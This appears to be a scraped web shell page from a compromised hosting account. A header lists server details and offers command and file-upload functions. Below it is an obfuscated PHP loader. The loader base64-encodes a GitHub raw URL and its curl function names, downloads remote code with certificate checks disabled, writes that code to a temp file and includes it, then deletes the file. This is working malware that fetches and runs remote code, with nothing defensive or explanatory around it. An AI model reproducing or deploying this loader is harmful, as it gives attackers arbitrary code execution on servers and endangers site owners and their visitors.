|
1Server IP : 2a02:4780:11:1776:0:2637:29db:10 / Your IP : 216.73.217.24 Web Server : LiteSpeed System : Linux in-mum-web1676.main-hosting.eu 5.14.0-503.38.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Apr 18 08:52:10 EDT 2025 x86_64 User : u641149403 ( 641149403) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /home/u641149403/domains/mistytourandtravel.in/../itciedu.in/../taxigotaxi.co.in/public_html/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
$url=base64_decode('aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2JsZWFjaGNoYW4vbHVmeXl0YXJvL3JlZnMvaGVhZHMvbWFpbi9zYW5qaS92eC50eHQ=');
$f_curl_init=base64_decode('Y3VybF9pbml0');
$f_curl_setopt=base64_decode('Y3VybF9zZXRvcHQ');
$f_curl_exec=base64_decode('Y3VybF9leGVj');
$f_curl_getinfo=base64_decode('Y3VybF9nZXRpbmZv');
$f_curl_error=base64_decode('Y3VybF9lcnJvcg==');
$f_curl_errno=base64_decode('Y3VybF9lcnJubw==');
$f_curl_close=base64_decode('Y3VybF9jbG9zZQ==');
$f_file_get=base64_decode('ZmlsZV9nZXRfY29udGVudHM=');
$f_stream_context=base64_decode('c3RyZWFtX2NvbnRleHRfY3JlYXRl');
function ambil($u,$a){
if(ini_get('allow_url_fopen')){
$c=@call_user_func($a[7],$u);
if($c!==false) return $c;
}
if(function_exists($a[0])){
$ch=call_user_func($a[0]);
call_user_func($a[1],$ch,CURLOPT_URL,$u);
call_user_func($a[1],$ch,CURLOPT_RETURNTRANSFER,1);
call_user_func($a[1],$ch,CURLOPT_SSL_VERIFYPEER,0);
call_user_func($a[1],$ch,CURLOPT_FOLLOWLOCATION,1);
call_user_func($a[1],$ch,CURLOPT_TIMEOUT,30);
$c=call_user_func($a[2],$ch);
if($c===false){
$no=call_user_func($a[5],$ch);
$msg=call_user_func($a[4],$ch);
call_user_func($a[6],$ch);
die("Gagal ambil konten. Error: $msg (kode $no)");
}
$info=call_user_func($a[3],$ch);
call_user_func($a[6],$ch);
if($info['http_code']==200||$info['http_code']==0) return $c;
die("Gagal ambil konten. HTTP ".$info['http_code']);
}
if(function_exists($a[8])){
$opts=['http'=>['method'=>'GET','timeout'=>30],'ssl'=>['verify_peer'=>0,'verify_peer_name'=>0]];
$ctx=call_user_func($a[8],$opts);
$c=@file_get_contents($u,false,$ctx);
if($c!==false) return $c;
$err=error_get_last();
die("FG gagal: ".($err['message']??'unknown'));
}
die("Tidak ada metode transport.");
}
$arr=[$f_curl_init,$f_curl_setopt,$f_curl_exec,$f_curl_getinfo,$f_curl_error,$f_curl_errno,$f_curl_close,$f_file_get,$f_stream_context];
$konten=ambil($url,$arr);
$tmp=tempnam(sys_get_temp_dir(),'tmp_');
if($tmp===false) die('Gagal buat file tmp');
if(file_put_contents($tmp,$konten)===false){unlink($tmp);die('Gagal tulis tmp');}
try{include($tmp);}catch(Throwable $e){echo'Error: '.$e->getMessage();}
unlink($tmp);
?>